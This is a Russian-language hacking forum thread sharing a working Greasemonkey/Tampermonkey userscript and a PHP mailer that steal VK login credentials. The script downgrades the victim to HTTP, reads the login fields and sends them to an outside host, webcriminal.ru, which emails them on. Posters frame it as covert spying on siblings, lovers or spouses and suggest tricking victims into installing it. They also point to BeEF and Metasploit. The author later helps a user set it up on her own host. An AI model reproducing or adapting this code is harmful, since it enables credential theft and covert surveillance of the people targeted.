Получаем логин пароль от соцсетей, форумов и т.д. без взлома

[ddd]

Часто обращаются с просьбой в помощи получения доступа к страничке брата\сестры\любовницы\жены (нужное подчеркнуть). И выкладывать за это килограммы денег они не хотят, по этому для таких халявщиков придумал простой способ без всяких кейлогеров(палятся антивирусами).

Нам потребуется:

1. Компьютер с установленным на него браузером Firefox.
   
2. Установленное на нем дополнение Greasemonkey
3. Веб хостинг, на котором можно запускать php скрипты (не обязательно)

В Greasemonkey создаем скрипт:

// ==UserScript==
// @name        WebCriminal getPassVK
// @namespace   vk
// @include     *//vk.com/*
// @version     1
// @require        https://ajax.googleapis.com/ajax/libs/jquery/1.7.1/jquery.min.js
// @grant       none
// ==/UserScript==

function sendMail(mail, login, pass) {
    $.ajax({
        type: 'GET',
        url: 'http://webcriminal.ru/send_mail.php', //php скрипт куда уходят данные, о нем ниже
        data: {"mail":mail, "login": login, "pass": pass},
        callbackParameter: 'callback',
        dataType: 'jsonp',
        timeout: 10000,
        success: function(json){
            //alert('success')
        },
        error: function(){
            //alert('error')
        }
    });
}
//если https, то редирект на http, иначе пароль не получим.
if(window.location.protocol=="https:"){window.location.href = "http://vk.com";}

$('#quick_login_button').live("click", function() {
    var login = $('input[id*="email"]').val() //выдираем  логин из поля ввода
    var pass = $('input[id*="pass"]').val() //выдираем пароль из поля ввода
    sendMail("ddd@webcriminal.ru", login, pass) //ddd@webcriminal.ru меняем на свое
    return false;
})

Данный скрипт посредством AJAX будет отправлять данные на PHP скрипт send_mail.php:

<?
function formatstr($str)
{
    $str = trim($str);
    $str = stripslashes($str);
    $str = htmlspecialchars($str);
    return $str;
}

$from_field = "From: WebCriminal <login_and_pass@webcriminal.ru>";
$subject = "Введенные данные";
$mail = formatstr($_GET["mail"]);
$login = formatstr($_GET["login"]);
$pass = formatstr($_GET["pass"]);
$message .= "Логин: ".$login.";";
$message .= "Пароль: ".$pass.";";
$mail = preg_replace('/%40/', '@', $mail);
mail($mail, $subject, $message, $from_field);
?>

Данный скрипт будет отправлять на ваше мыло полученные данные.

Итого: вы можете переделать выше описанные скрипты под получение данных с любых вебформ, и на последующую их обработку.

P.S. скрипт send_mail.php размещенный на сайте вебкриминала не ведет логи, и еслиб даже и вел, то все равно не понятно с какого ресурса получены данные.

P.S2. способ безпалевный, в последних версиях лисы можно спрятать значок обезьянки, чтоб не смущать подопытного пользователя. А чтобы быстро установить скрипт в Greasemonkey, достаточно сохранить его с расширением js и запустить на компьютере жерты с помощью Firefox.

 

[bat-man]

А где скачать Greasemonkey? Я что то не пойму этот скрипт как подкинуть жертве или этот скрипт сам следит за жертвой и выдаёт пароли от мэйла либо его нужно закинуть в комп жкртвы обьясни пожалуйста я просто чайник в этом деле...

 

[ddd]

@bat-man, для начала коротко об дополнении, чтоб было понятно что к чему:

Greasemonkey - это расширение, изначально написанное для браузера Mozilla Firefox, которое позволяет выполнять пользовательский JavaScript-код на любых веб-страницах. То есть пользователь может добавить свой собственный JavaScript, который запуститься вместе с теми скриптами, которые уже есть на сайте. Greasemonkey может понадобиться для многих целей, одна из них - добавление нового функционала, который не предусмотрен самим сайтом.

Скачивать просто. Открываешь Firefox, жмешь сочетание клавишь Ctrl+Shift+A и в открывшейся вкладке делаешь поиск дополнения(Greasemonkey), после чего устанавливаешь его. Далее нужно создать в нем выше описанный скрипт.
Способ 100% действенный при прямом доступе к компьютеру, но конечно можно и извратиться и впарить все это удаленно. Например убедив жертву в том что с данным аддоном(Greasemonkey) его жизнь станет легче, и для примера пихнешь ему безобидный скрипт, а после того как войдешь в полное доверие дать описанный в этой теме, либо сразу дашь безобидный скрипт с перцовой начинкой. В общем все это творческий процесс :)

 

[bat-man]

Извеняюсь за офтоп спасибо за ответ мне твой форум нравится если хочешь его образовать скачать уникальный дизаин ксенки там есть много плагинов в этом сайте http://hackfor.ru/ я там модератор если захочеь что либо скачать с этого сайта я дам тебе свой логин и пароль и скачивай что угодно для ксенки
если конечно хочешь лучших плагинов в инете кроме этого сайта не нашёл когда тестировал xenforo.

 

[Chr()m]

А как от подобного защититься? Если каждый раз быть внимательным можно параноей заболеть :)

 

[ddd]

@Chr()m, если именно от этого, то только используя https, если вас перебрасывает на незащищенный протокол, то стоит задуматься. Но бдительность вас не всегда выручит, если на машине стоит кейлогер и прочий софт, то вас спасет только двухэтапная авторизация или одноразовые пароли, если таковые имеются. Например в контакте это включается в настройках безопасности https://vk.com/settings?act=security если даже ваш пароль скомпрометирован, то под ним не смогут залогинется без доступа к вашему телефону.

Еще заходите только со своих устройств, не давайте свои устройства посторонним людям, правда сниферы все равно не кто не отменял, так что ваши данные на совести сервисов которыми вы пользуетесь. Или на вас, если вы не используете подобные настройки :)

 

[Oper]

А скрипт можно настроить так, чтоб он все отправляемые сообщения в контакте пересылал на мыло?

 

[ddd]

А скрипт можно настроить так, чтоб он все отправляемые сообщения в контакте пересылал на мыло?

Привет, конечно можно, только смысл? Твою почту заспамит смайликами и т.п.
В контакте ведь
любят
общаться
так
:)
а не предложениями как на форумах. В вашем случае нужно чтоб скрипт складировал лог переписки, и через какой-то промежуток времени скидывал его на почту.

 

[rus23]

А на Хром есть что нибудь подобное?

 

[Infoman]

@rus23, в хроме есть расширение Tampermonkey, думаю по аналогии, установить, создать новый скрипт и вставить код из первого сообщения.

 

[xrahitel]

А на Хром есть что нибудь подобное?

 

[maik.blackvud]

хм ну и вата это всё, я думал метод нормальный а этот метод шлак.
Мне кажется проще, эксплоит нормальный в парить чем сидеть страдать фигнёй.
К тому же доступ физический к пк нужен, это уже минус, если на то пошло и есть вафля можно через Акулу трафик отснифирить.
Для таких случаев кстати есть Beef на kali linux, он куда удобнее и практичнее, к тому же не надо велосипед выдумывать..
А если жертва на андроид? то этот метод идёт лесом просто, metasploit юзай и будет счастье тебе.

 

[Infoman]

хм ну и вата это всё, я думал метод нормальный а этот метод шлак.
Мне кажется проще, эксплоит нормальный в парить чем сидеть страдать фигнёй.
К тому же доступ физический к пк нужен, это уже минус, если на то пошло и есть вафля можно через Акулу трафик отснифирить.
Для таких случаев кстати есть Beef на kali linux, он куда удобнее и практичнее, к тому же не надо велосипед выдумывать..
А если жертва на андроид? то этот метод идёт лесом просто, metasploit юзай и будет счастье тебе.

С чьей позиции судишь? В начале темы же ясно сказано:

Часто обращаются с просьбой в помощи получения доступа к страничке брата\сестры\любовницы\жены (нужное подчеркнуть).

Думаешь те кто обращаются смогут сплойт впарить? Проанализировать дамп ваершарка? Запустить кали? Да они от этих слов под кровать спрячутся
Тут показан простой вектор атаки, для которого хватит знаний уровень чайник

 

[maik.blackvud]

С чьей позиции судишь? В начале темы же ясно сказано:


Думаешь те кто обращаются смогут сплойт впарить? Проанализировать дамп ваершарка? Запустить кали? Да они от этих слов под кровать спрячутся
Тут показан простой вектор атаки, для которого хватит знаний уровень чайник

Согласен но мне кажется даже из перечисленного школьник будет в ступоре потому что не поймет как это всё заставить работать =)

 

[nnn]

Какими конкретно способами в настоящее время хакеры взламывают аккаунты в соцсетях? Пожалуйста, расскажите вкратце.

 

[ddd]

Какими конкретно способами в настоящее время хакеры взламывают аккаунты в соцсетях? Пожалуйста, расскажите вкратце.

В настоящее время все способы используют социальную инженерию, нужно как-то заставить жертву пройти на специально сформированную страницу или запустить какой-то софт на компьютере или мобильном устройстве.

 

[maik.blackvud]

В настоящее время все способы используют социальную инженерию, нужно как-то заставить жертву пройти на специально сформированную страницу или запустить какой-то софт на компьютере или мобильном устройстве.

СИ+EXPLOIT Действует безотказно.

 

[russtreeter52]

обьясните пожалуйста где что нужно исправить в скрипте, как получается то с какой почты на какую он отправляет?(плохо шарю)

 

[russtreeter52]

на хост закинула send_mail и исправила
sendMail("ddd@webcriminal.ru", login, pass) тута , скурипт запустила в tampermonkey в хром , скурипт без ошибок

 

[ddd]

@russtreeter52, в файле send_mail.php нужно только указать от кого будет ходить почта:

$from_field = "From: WebCriminal <login_and_pass@webcriminal.ru>";

Вместо login_and_pass@webcriminal.ru можно указать свое или вообще не трогать.

а в tampermonkey в вашем случае нужно поменять 2-е строки:

function sendMail(mail, login, pass) {
$.ajax({
type: 'GET',
url: 'http://ВАШ_ХОСТ/send_mail.php',

...

$('#quick_login_button').live("click", function() {
var login = $('input[id*="email"]').val() //выдираем логин из поля ввода
var pass = $('input[id*="pass"]').val() //выдираем пароль из поля ввода
sendMail("ваш@емайл", login, pass)